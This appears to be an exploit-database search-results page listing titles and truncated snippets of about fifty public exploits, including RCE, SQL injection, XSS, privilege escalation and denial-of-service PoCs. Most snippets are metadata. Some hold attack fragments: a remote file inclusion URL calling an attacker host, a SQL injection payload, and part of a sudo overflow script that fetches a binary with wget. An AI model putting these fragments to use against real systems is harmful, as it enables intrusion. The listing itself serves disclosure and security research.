47904 matches found
H2 Database 1.4.199 - JNI Code Execution
Exploit Title: H2 Database 1.4.199 - JNI Code Execution Exploit Author: 1F98D Original Author: Markus Wulftange Date: 28 April 2020 Vendor Hompage: https://www.h2database.com/ Tested on: Windows 10 x64, Java 1.8, H2 1.4.199 References:...
Qmail SMTP 1.03 - Bash Environment Variable Injection
Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection Date: 2020-07-03 Exploit Author: 1F98D Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon Version: Qmail 1.03 Tested on: Debian 9.11 x64 CVE: CVE-2014-6271 References: http://seclists.org/oss-sec/2014/q3/649...
WordPress Plugin Simple File List 5.4 - Remote Code Execution
Exploit Title: Wordpress Plugin Simple File List 5.4 - Remote Code Execution Date: 2020-04-2019 Exploit Author: coiffeur Vendor Homepage: https://simplefilelist.com/ Software Link: https://wordpress.org/plugins/simple-file-list/ Version: Wordpress v5.4 Simple File List v4.2.2 import requests impo...
SpotAuditor 5.3.4 - 'Name' Denial of Service (PoC)
Exploit Title: SpotAuditor 5.3.4 - 'Name' Denial of Service PoC Exploit Author: 0xMoHassan Date: 2020-04-04 Vendor Homepage: https://www.spotauditor.com/ Software Link: http://www.nsauditor.com/downloads/spotauditorsetup.exe Tested Version: 5.3.4 Vulnerability Type: Denial of Service DoS Local...
Trend Micro Maximum Security 2019 - Privilege Escalation
Exploit Title: Trend Micro Maximum Security 2019 - Privilege Escalation Date: 2020-1-16 Exploit Author: hyp3rlinx Vendor Homepage: www.trendmicro.com Version: Platform Microsoft Windows, Premium Security 2019 v15, Maximum Security 2019 v15 Internet Security 2019 v15, Antivirus + Security 2019 v15...
Microsoft Windows Kernel - Out-of-Bounds Read in CI!HashKComputeFirstPageHash While Parsing Malformed PE File
We have encountered a Windows kernel crash in CI!HashKComputeFirstPageHash while trying to load a malformed PE image into the process address space as a data file i.e. LoadLibraryExLOADLIBRARYASDATAFILE | LOADLIBRARYASIMAGERESOURCE. An example crash log generated after triggering the bug is shown...
iMessage - NSKeyedUnarchiver Deserialization Allows file Backed NSData Objects
The class NSDataFileBackedFuture can be deserialized even if secure encoding is enabled. This class is a file-backed NSData object that loads a local file into memory when the NSData bytes selector is called. This presents two problems. First, it could potentially allow undesired access to local...
Oracle Document Capture - Actbar2.ocx Insecure Method
Source: http://packetstormsecurity.org/files/view/97866/DSECRG-11-004.txt ActiveX components contain insecure methods. Digital Security Research Group DSecRG Advisory DSECRG-00153 Application: Oracle Document Capture Versions Affected: Release 10gR3 Vendor URL: www.oracle.com Bugs: insecure metho...
Microsoft IIS 5.0 - Printer Host Header Overflow (MS01-023) (Metasploit)
$Id: ms01023printer.rb 9179 2010-04-30 08:40:19Z jduck $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of use. http://metasploit.com/framework...
phpBazar 2.1.0 - Remote File Inclusion / Authentication Bypass
Title: phpBazar = 2.1.0 Multiple vulnerabilites URL: http://www.smartisoft.com/ Dork: inurl:classified.php phpbazar Exploits: -remote file inclusion: /classifiedright.php?languagedir=http://yourhost/cmd.gif?cmd=ls -access to admin login and password: /admin/admin.php?action=editmember&value=1...
CodetoSell ViArt Shop Enterprise 2.1.6 - 'basket.php' Multiple Cross-Site Scripting Vulnerabilities
source: https://www.securityfocus.com/bid/13462/info ViArt Shop is affected by multiple cross-site scripting and HTML injection vulnerabilities. These issues are due to a failure in the application to properly sanitize user-supplied input before using it in dynamically generated content...
WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page
Exploit Title: WebMethods Integration Server 10.15.0.0000-0092 - Improper Access on Login Page Date: 25-01-2024 Exploit Author: Rasime Ekici Vendor Homepage: www.softwareag.com Version: 10.15.0000-0092 Tested on: 10.15.0000-0092 CVE : 2024-23733 Description: The /WmAdmin/,/invoke/vm.server/login...
Screen SFT DAB 600/C - Authentication Bypass Erase Account
!/usr/bin/env python3 Exploit Title: Screen SFT DAB 600/C - Authentication Bypass Erase Account Exploit Author: LiquidWorm Vendor: DB Elettronica Telecomunicazioni SpA Product web page: https://www.screen.it | https://www.dbbroadcast.com...
Online Diagnostic Lab Management System v1.0 - Remote Code Execution (RCE) (Unauthenticated)
Exploit Title: Online Diagnostic Lab Management System v1.0 - Remote Code Execution RCE Unauthenticated Google Dork: N/A Date: 2022-9-23 Exploit Author: yousef alraddadi - https://twitter.com/y0usef11 Vendor Homepage:...
T-Soft E-Commerce 4 - SQLi (Authenticated)
Exploit Title: T-Soft E-Commerce 4 - SQLi Authenticated Exploit Author: Alperen Ergel Contact: @alpernae IG/TW Software Homepage: https://www.tsoft.com.tr/ Version : v4 Tested on: Kali Linux Category: WebApp Google Dork: N/A CVE: 2022-28132 Date: 18.02.2022 Description Step-1: Login as Admin or...
ImpressCMS v1.4.4 - Unrestricted File Upload
Exploit Title: ImpressCMS v1.4.4 - Unrestricted File Upload Date: 7/4/2022 Exploit Author: Ünsal Furkan Harani Zemarkhos Vendor Homepage: https://www.impresscms.org/ Software Link: https://github.com/ImpressCMS/impresscms Version: v1.4.4 Description: Between lines 152 and 162, we see the function...
WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)
Exploit Title: WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery CSRF Date: 2/28/2021 Author: 0xB9 Software Link: https://wordpress.org/plugins/fitness-calculators/ Version: 1.9.5 Tested on: Windows 10 CVE: CVE-2021-24272 1. Description: The plugin add calculators for Water...
Support Board 3.3.3 - 'Multiple' SQL Injection (Unauthenticated)
Exploit Title: Support Board 3.3.3 - 'Multiple' SQL Injection Unauthenticated Date: 29.08.2021 Exploit Author: John Jefferson Li Vendor Homepage: https://board.support/ Software Link: https://codecanyon.net/item/support-board-help-desk-and-chat/20359943 Version: 3.3.3 Tested on: Ubuntu 20.04.2 LT...
ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation
Exploit Title: ICE Hrm 29.0.0.OS - 'Account Takeover' Cross-Site Scripting and Session Fixation Exploit Author: Piyush Patil & Rafal Lykowski Vendor Homepage: https://icehrm.com/ Version: 29.0.0.OS Tested on: Windows 10 and Kali Description ICE Hrm Version 29.0.0.OS is vulnerable to session...
Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free
Exploit Title: Microsoft Internet Explorer 8 - 'SetMouseCapture ' Use After Free Date: 15/05/2021 CVE : CVE-2013-3893 PoC: https://github.com/travelworld/cve20133893trigger.html/blob/gh-pages/params.json Exploit Author: SlidingWindow Vendor Advisory:...
Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection (Authenticated)
Exploit Title: Web Based Quiz System 1.0 - 'eid' Union Based Sql Injection Authenticated Date: 04-03-2021 Exploit Author: Deepak Kumar Bharti Vendor Homepage: https://www.sourcecodester.com Software Download Link:...
Triconsole 3.75 - Reflected XSS
Exploit Title: Triconsole 3.75 - Reflected XSS Google Dork: inurl : /calendar/calendarform.php Date: 15/2/2021 Exploit Author: Akash Chathoth Vendor Homepage: http://www.triconsole.com/ Software Link: http://www.triconsole.com/php/calendardatepicker.php Version: alertdocument.domain...
Nsauditor 3.2.2.0 - 'Event Description' Denial of Service (PoC)
Exploit Title: Nsauditor 3.2.2.0 - 'Event Description' Denial of Service PoC Date: 2021-02-15 Exploit Author: Ismael Nava Vendor Homepage: https://www.nsauditor.com/ Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Version: 3.2.2.0 Tested on: Windows 10 Home x64 STEPS Open the...
Queue Management System 4.0.0 - "Add User" Stored XSS
Exploit Title: Queue Management System 4.0.0 - "Add User" Stored XSS Exploit Author: Kislay Kumar Date: 2020-12-21 Google Dork: N/A Vendor Homepage: http://codekernel.net/ Software Link: https://codecanyon.net/item/queue-management-system/22029961 Affected Version: Version 4.0.0 Patched Version:...
SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting
Title: SuperBackup 2.0.5 for iOS - Persistent Cross-Site Scripting Author: Vulnerability Laboratory Date: 2020-04-15 Vendor: http://dropouts.in/ Software Link: https://apps.apple.com/us/app/super-backup-export-import/id1052684097 CVE: N/A Document Title: =============== SuperBackup v2.0.5 iOS - V...
FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)
Exploit Title: FlashFXP 4.2.0 Build 1730 - Denial of Service PoC Vendor Homepage: https://www.flashfxp.com/ Software Link Download: https://www.filehorse.com/download-flashfxp/22451/download/ Exploit Author: Paras Bhatia Discovery Date: 2020-03-30 Vulnerable Software: FlashFXP Version: 4.2.0 Buil...
Redis - Replication Code Execution (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Redis Replication Code Execution', 'Description' = %q This module can be used to leverage the extension functionality added since Redis 4.0.0 to...
Google Chrome 67, 68 and 69 - Object.create Type Confusion (Metasploit)
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Google Chrome 67, 68 and 69 Object.create exploit', 'Description' = %q This modules exploits a type confusion in Google Chromes JIT compiler. The...
SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure
Exploit Title: SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure Author: Todor Donev Date: 2020-02-23 Vendor: https://secu.jp/ Product Link: https://secu.jp/support/831.html CVE: N/A !/usr/bin/perl SecuSTATION SC-831 HD Camera Remote Configuration Disclosure Copyright 2020 c Todor...
Sudo 1.8.25p - 'pwfeedback' Buffer Overflow
!/bin/bash We will need socat to run this. if ! -f socat ; then wget https://raw.githubusercontent.com/andrew-d/static-binaries/master/binaries/linux/x8664/socat chmod +x socat fi cat xpl.pl $bufsz = 256; $askpasssz = 32; $signosz = 465; $tgetpassflag = "\x04\x00\x00\x00" . "\x00"x24;...
Joomla! component com_jsjobs 1.2.6 - Arbitrary File Deletion
Exploit Title: Joomla! component comjsjobs 1.2.6 - Arbitrary File Deletion Dork: inurl:"index.php?option=comjsjobs" Date: 2019-08-16 Exploit Author: qw3rTyTy Vendor Homepage: https://www.joomsky.com/ Software Link: https://www.joomsky.com/5/download/1 Version: 1.2.6 Tested on: Debian/nginx/joomla...
microASP (Portal+) CMS - 'pagina.phtml?explode_tree' SQL Injection
Sql Injection on microASP Portal+ CMS + Date: 05/05/2019 + Risk: High + CWE Number : CWE-89 + Author: Felipe Andrian Peixoto + Vendor Homepage: http://www.microasp.it/ + Contact: [email protected] + Tested on: Windows 7 and Gnu/Linux + Dork: inurl:"/pagina.phtml?explodetree" // use your...
River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)
Exploit Title: River Past Ringtone Converter v2.7.6.1601 - Denial of Service PoC Discovery by: Rafael Pedrero Discovery Date: 2019-01-30 Vendor Homepage: http://www.riverpast.com/ Software Link : http://www.riverpast.com/ Tested Version: v2.7.6.1601 Tested on: Windows XP SP3 Vulnerability Type:...
Broadcom Wi-Fi SoC - TDLS Teardown Request Remote Heap Overflow
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1046 https://googleprojectzero.blogspot.ca/2017/04/over-air-exploiting-broadcoms-wi-fi4.html Broadcom produces Wi-Fi HardMAC SoCs which are used to handle the PHY and MAC layer processing. These chips are present in both mobile...
X2CRM v6.6/6.9 - Reflected Cross-Site Scripting (XSS) (Authenticated)
Exploit Title: X2CRM v6.6/6.9 - Reflected Cross-Site Scripting XSS Authenticated Exploit Author: Betul Denizler Vendor Homepage: https://x2crm.com/ Software Link: https://sourceforge.net/projects/x2engine/ Version: X2CRM v6.6/6.9 Tested on: Ubuntu Mate 20.04 Vulnerable Parameter: model CVE: Use...
ImageMagick 7.1.0-49 - DoS
Exploit Title: ImageMagick 7.1.0-49 - DoS Author: nu11secur1ty Date: 02.07.2023 Vendor: https://imagemagick.org/ Software: https://imagemagick.en.uptodown.com/windows/download/82953605 Reference: https://portswigger.net/daily-swig/denial-of-service CVE-ID: CVE-2022-44267 Description: ImageMagick...
qubes-mirage-firewall v0.8.3 - Denial Of Service (DoS)
Exploit Title: qubes-mirage-firewall v0.8.3 - Denial Of Service DoS Date: 2022-12-04 Exploit Author: Krzysztof Burghardt Vendor Homepage: https://mirage.io/blog/MSA03 Software Link: https://github.com/mirage/qubes-mirage-firewall/releases Version: = 0.8.0 & 0.8.4 Tested on: Qubes OS CVE:...
Desktop Central 9.1.0 - Multiple Vulnerabilities
Exploit Title: Desktop Central 9.1.0 - Multiple Vulnerabilities Discovery by: Rafael Pedrero Discovery Date: 2021-02-14 Software Link : http://www.desktopcentral.com Tested Version: 9.1.0 Build No: 91084 Tested on: Windows 10 Vulnerability Type: CRLF injection CRLF - 1 CVSS v3: 6.1 CVSS vector:...
Beehive Forum - Account Takeover
Exploit Title: Beehive Forum - Account Takeover Date:08/05/2022. Exploit Author: Pablo Santiago Vendor Homepage: https://www.beehiveforum.co.uk/ Software Link: https://sourceforge.net/projects/beehiveforum/ Version: 1.5.2 Tested on: Kali Linux and Ubuntu 20.0.4 CVE N/A PoC:...
GetSimple CMS 3.3.4 - Information Disclosure
Exploit Title: GetSimple CMS 3.3.4 - Information Disclosure Date 01.06.2021 Exploit Author: Ron Jost Hacker5preme Vendor Homepage: http://get-simple.info/ Software Link: https://github.com/GetSimpleCMS/GetSimpleCMS/archive/refs/tags/v3.3.4.zip Version: 3.3.4 CVE: CVE-2014-8722 Documentation:...
Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting (XSS)
Exploit Title: Textpattern CMS 4.9.0-dev - 'Excerpt' Persistent Cross-Site Scripting XSS Date: 2021-03-04 Exploit Author: Tushar Vaidya Vendor Homepage: https://textpattern.com Software Link: https://textpattern.com/start Version: v 4.9.0-dev Tested on: Windows Steps-To-Reproduce: 1. Login into...
LayerBB 1.1.4 - 'search_query' SQL Injection
Exploit Title: LayerBB 1.1.4 - 'searchquery' SQL Injection Date: 2021-02-19 Exploit Author: Görkem Haşin Version: 1.1.4 Tested on: Linux/Windows POST /search.php HTTP/1.1 Host: Target Payload: searchquery=Lffd' AND 8460=SELECT CASE WHEN 8460=8460 THEN 8460 ELSE SELECT 1560 UNION SELECT 2122 END--...
WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities
Exploit Title: WordPress Plugin Supsystic Digital Publications 1.6.9 - Multiple Vulnerabilities Date: 24/07/2020 Exploit Author: Erik David Martin Vendor Homepage: https://supsystic.com/ Software Link: https://downloads.wordpress.org/plugin/digital-publications-by-supsystic.1.6.9.zip Version: 1.6...
Resumes Management and Job Application Website 1.0 - Authentication Bypass
Exploit Title: Resumes Management and Job Application Website 1.0 - Authentication Bypass Sql Injection Date: 2020-12-27 Exploit Author: Kshitiz Raj manitorpotterk Vendor Homepage: http://egavilanmedia.com Software Link: https://egavilanmedia.com/resumes-management-and-job-application-website/...
Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS
Exploit Title: Sales and Inventory System for Grocery Store 1.0 - Multiple Stored XSS Exploit Author: Vijay Sachdeva pwnshell Date: 2020-12-23 Vendor Homepage: https://www.sourcecodester.com/php/11238/sales-and-inventory-system-grocery-store.html Software Link:...
e-learning Php Script 0.1.0 - 'search' SQL Injection
Exploit Title: e-learning Php Script 0.1.0 - 'search' SQL Injection Date: 2020-06-29 Exploit Author: KeopssGroup0day,Inc Vendor Homepage: https://github.com/amitkolloldey/elearning-script Software Link: https://github.com/amitkolloldey/elearning-script Version: 0.1.0 Tested on: Kali Linux Source...
qdPM 9.1 - 'cfg[app_app_name]' Persistent Cross-Site Scripting
Exploit Title: qdPM 9.1 - 'cfgappappname' Persistent Cross-Site Scripting Google Dork: N/A Date: 2020-05-19 Exploit Author: Kishan Lal Choudhary Vendor Homepage: https://qdpm.net Software Link: https://sourceforge.net/projects/qdpm/ Version: 9.1 Tested on: Windows 10 Description: The form paramet...
Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting
Exploit Title: Cisco Digital Network Architecture Center 1.3.1.4 - Persistent Cross-Site Scripting Date: 2020-04-16 Exploit Author: Dylan Garnaud & Benoit Malaboeuf - Pentesters from Orange Cyberdefense France Vendor Homepage:...
HardDrive 2.1 for iOS - Arbitrary File Upload
Title: HardDrive 2.1 for iOS - Arbitrary File Upload Author: Vulnerability Laboratory Date: 2020-04-30 Software: https://apps.apple.com/ch/app/harddrive/id383226784 CVE: N/A Document Title: =============== HardDrive v2.1 iOS - Arbitrary File Upload Vulnerability References Source:...
PANDORAFMS 7.0 - Authenticated Remote Code Execution
Exploit Title: PANDORAFMS 7.0 - Authenticated Remote Code Execution Date: 2020-02-12 Exploit Author: Engin Demirbilek Vendor homepage: http://pandorafms.org/ Version: 7.0 Software link: https://pandorafms.org/features/free-download-monitoring-software/ Tested on: CentOS CVE: CVE-2020-8947...